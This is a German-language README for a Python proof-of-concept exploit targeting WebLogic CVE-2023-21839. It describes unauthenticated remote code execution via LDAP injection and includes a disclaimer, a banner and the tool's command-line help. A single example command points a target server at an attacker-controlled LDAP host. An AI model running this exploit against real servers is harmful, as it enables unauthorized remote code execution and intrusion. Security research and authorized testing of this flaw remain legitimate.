
Python-PoC-Exploit für CVE-2023-21839, der WebLogic-Server über LDAP-Injection für nicht authentifizierte Remote-Codeausführung angreift.
Aufgrund besonderer Anforderungen wurde die GO-Version von @4ra1n in Python übersetzt. Vielen Dank dafür!
Dieses Programm sollte nur für autorisierte Sicherheitstests und Forschungszwecke verwendet werden. Bitte verwenden Sie es in Übereinstimmung mit dem Cybersicherheitsgesetz.
Der Autor übernimmt keine Verantwortung für illegale Angriffe oder andere rechtswidrige Handlungen, die durch die Nutzung dieses Tools durch den Anwender entstehen.
vulhub Reproduktion: Link
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
